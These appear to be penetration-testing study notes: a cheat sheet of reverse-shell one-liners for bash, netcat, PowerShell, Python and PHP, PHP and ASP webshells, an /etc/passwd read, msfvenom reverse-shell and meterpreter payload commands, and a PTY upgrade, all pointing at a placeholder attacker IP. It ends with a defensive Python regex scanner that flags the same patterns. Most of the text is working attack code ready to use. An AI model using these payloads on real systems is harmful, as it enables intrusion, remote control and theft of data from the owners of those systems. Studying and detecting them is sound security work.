# Basic Linux Revshells

- NOTE: May need to URL encode when dealing with a webserver

```bash
bash -c 'bash -i >& /dev/tcp/<kali_ip>/<port> 0>&1'
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <kali_ip> <port> > /tmp/f   # requires nc on target
nc -e /bin/sh <kali_ip> <port>   # requires nc (with -e support) on target
```

# Basic Powershell Revshell

- NOTE: May need to URL and/or base64 encode when dealing with a webserver

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<kali_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

# Python Revshell

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<kali_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

# PHP Revshell

```bash
php -r '$sock=fsockopen("<kali_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```

```php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <kali_ip> <port> >/tmp/f"); ?>   # requires nc on target
```

# PHP and ASP Webshells

```php
<?php echo "Hello!"; ?>                           # simple test
<?php system($_GET['cmd']); ?>                    # basic PHP webshell
<?php system($_REQUEST['cmd']); ?>                # REQUEST enables both GET and POST requests
<?php system('whoami'); ?>                        # basic PHP command execution
<?php echo file_get_contents('/etc/passwd'); ?>   # basic PHP file read (echo is required, otherwise nothing is returned)
```

```asp
<% eval request('cmd') %>   # basic ASP webshell
```

# Other Web & Revshells

- For webshells, can also use `laudanum`, `nishang/Antak` or `WhiteWinterWolf`
- For WIN, use a `nishang` payload such as `Invoke-PowerShellTcp.ps1`

```bash
ls -al /usr/share/laudanum
```

![[images/Pasted image 20260309182158.png]]

```bash
ls -al /usr/share/nishang
```

![[images/Pasted image 20260309182349.png]]

---

# Payloads

## Custom Revshell Payloads

- Pair with listener: `sudo nc -lvnp <port>`
- NOTE: Payload can be `reverse_https` or `shell_reverse_tcp`; Linux payload paths include the architecture (`linux/x86/...` or `linux/x64/...`)

```bash
sudo msfvenom -p linux/x64/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf
sudo msfvenom -p windows/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f exe > shell.exe
```

## Meterpreter Payloads

- Pair with `exploit/multi/handler` module in msf

```bash
sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=<kali_ip> LPORT=<port> -f exe -o shell.exe
```

## DLL payload

- After loading `msfconsole -q`, run `search windows/smb/smb_delivery`
- For example usage, see [[5 - CPTS/3 - CPTS Notes/24 - Windows Privesc/29 - Windows Server|Windows Server]]

## C Payload

- Minimal C wrapper that runs a command (the payload) via `system()` when executed
- Compile into an `elf` with `gcc input.c -o file.out`

```c
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    system("PAYLOAD HERE");   // replace with the command to run
    return 0;
}
```

## Python Payload

- Spawns `/bin/sh` inside a pseudo-terminal; commonly used to upgrade a non-TTY shell to an interactive one

```bash
python -c 'import pty; pty.spawn("/bin/sh")'
```
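The one-liners and webshells collected above all carry distinctive strings (`/dev/tcp/`, `mkfifo ... | nc`, `nc -e`, `pty.spawn(`, `system($_GET`, `eval request(`). As an added defender-side example that is not part of the original notes, the following Python scanner flags those strings in uploaded file contents or process command lines; the rule names and the sample inputs are constructed for the example.

```python
import re

# Constructed sample inputs (file contents and command lines), not from a real host.
SAMPLES = {
    "upload.php":     "<?php system($_REQUEST['cmd']); ?>",
    "index.php":      "<?php echo 'Hello!'; ?>",
    "cmd.asp":        "<% eval request('cmd') %>",
    "proc_cmdline_1": "bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'",
    "proc_cmdline_2": "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f",
    "proc_cmdline_3": "python -c 'import pty; pty.spawn(\"/bin/sh\")'",
    "proc_cmdline_4": "ls -al /var/www/html",
}

# Each rule is (name, compiled regex). Names are this example's own labels.
RULES = [
    # PHP: an exec-style function fed directly from a request parameter
    ("php_webshell_exec_from_request",
     re.compile(r"(system|exec|shell_exec|passthru)\s*\(\s*\$_(GET|POST|REQUEST)\b")),
    # Classic ASP: eval over a request value
    ("asp_eval_request", re.compile(r"\beval\s*\(?\s*request\s*\(", re.I)),
    # bash /dev/tcp redirection
    ("bash_dev_tcp_redirect", re.compile(r"/dev/tcp/\S+")),
    # named-pipe shell piped into nc
    ("mkfifo_nc_pipe", re.compile(r"mkfifo\s+\S+.*\|\s*nc\b", re.S)),
    # nc invoked with -e <program>
    ("nc_exec_flag", re.compile(r"\bnc\s+(-\S*\s+)*-e\s+/bin/")),
    # Python PTY spawn
    ("python_pty_spawn", re.compile(r"pty\.spawn\(")),
    # Python socket fds duplicated onto stdin/stdout/stderr
    ("fd_dup_to_socket", re.compile(r"os\.dup2\(s\.fileno\(\)")),
    # PowerShell raw TCP client
    ("powershell_tcpclient", re.compile(r"System\.Net\.Sockets\.TCPClient", re.I)),
]


def scan(text):
    """Return the names of all rules matching one file body or command line."""
    return [name for name, pattern in RULES if pattern.search(text)]


def scan_all(samples):
    """Scan a mapping of label -> text; only labels with at least one hit are returned."""
    return {label: hits for label, text in samples.items() if (hits := scan(text))}


if __name__ == "__main__":
    for label, hits in scan_all(SAMPLES).items():
        print(f"{label}: {', '.join(hits)}")
```

In practice the same rules can be run over web-root uploads and over process-creation events (e.g. `/proc/<pid>/cmdline` or auditd `execve` records) to alert on these patterns.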